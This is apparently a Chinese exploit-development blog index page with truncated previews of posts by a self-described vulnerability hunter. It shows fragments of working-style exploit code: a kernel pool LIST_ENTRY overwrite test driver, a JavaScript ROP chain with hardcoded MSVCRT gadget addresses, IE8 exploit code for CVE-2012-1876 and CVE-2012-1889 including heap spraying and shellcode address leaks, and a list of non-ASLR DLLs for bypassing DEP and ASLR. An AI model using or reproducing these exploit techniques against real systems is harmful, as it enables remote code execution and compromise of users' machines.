
漏洞利用
instruder
I'am a Vulnerability hunter!
alert("instruder")
展开
-
KERNEL POOL LIST ENTRY OVERWRITE ATTACK
KERNEL POOL LISTENTRY OVERWRITE ATTACK LIST_ENTRY OVERWRITE 原理图 测试代码:Sys: VOID Nopagepool_ListEntry_Overwrite(ULONGcbin,ULONG cout,UCHAR * InputBuffer){ PVOIDpatdbuffer=NULL,p原创 2012-02-29 21:04:27 · 925 阅读 · 0 评论 -
MSVCRT:ROP - CN 修改ROP检测标志
function getddd() { var kkkkk = unescape("\u0433\u77bf"); kkkkk +=unescape("\u5ed5\u77be"); //xchg eax,esp retn kkkkk += unescape("\uf519\u77be")////pop ecx,retn kkkkk += unescape("\u9ef8\u1009原创 2014-04-08 23:21:34 · 2464 阅读 · 0 评论 -
Well-known DEP-violating thunks
这几天调试发现一个奇怪的现象,一个在数据区段执行的指令,在开启了系统dep时竟然还可以继续执行,换成其他指令就不可以,而且执行时这个内存属性仍旧是不可执行属性。同时按理指令是一条一条执行,但是这个指令的执行是跳跃了,瞬间差点毁了多年的指令执行三观。debugwin7+system dep openBreakpoint 0 hiteax=2e81e原创 2013-04-10 19:24:57 · 3624 阅读 · 0 评论 -
当前多数杀软主防存在的缺陷
见 链接 http://www.binvul.com/viewthread.php?tid=240&extra=page%3D1原创 2012-12-03 23:18:22 · 1033 阅读 · 0 评论 -
cve-2012-1876 win7_ie8_leak_shellcode code
alert("begin")//var div_container = document.getElementById("test");//div_container.style.cssText = "display:none";var cloned = new Array();var selob = document.createElement("select");selob.w0原创 2012-08-08 12:55:06 · 3167 阅读 · 0 评论 -
cve2012-1876 leak mshtml base address and leak shellcode base address
leak mshtml base address leak shellcode base address其中leak shellcode base 思路是联合 http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003原创 2012-08-06 21:21:58 · 1385 阅读 · 0 评论 -
没有ASLR的几个DLL
DpoFeedb.dll 指纹识别 现在买的笔记本都有MSCOMCTL.OCX 需要用户点一次允许 之后就不需要了VBE7INTL.DLL 未找到加载方式迅雷 mcvcr71.dlljava6 mcvcr71.dllcomct232.ocx 需要用户点一次允许 之后就不需要了com原创 2012-06-22 15:49:13 · 1341 阅读 · 0 评论 -
cve2012-1889 ie8 rop
采用inking 大牛的方法function exploit(){obj = document.getElementById('oo').object;var src = unescape("%u0c0c%u0c0c");while (src.length < 0x1002) src += src;src = "\\\\xxx" + src;src = src.subs原创 2012-06-19 00:49:30 · 1269 阅读 · 0 评论 -
ms10_046_shortcut_icon_dllloader 这个其实很好用
原创 2014-04-08 23:34:21 · 3803 阅读 · 1 评论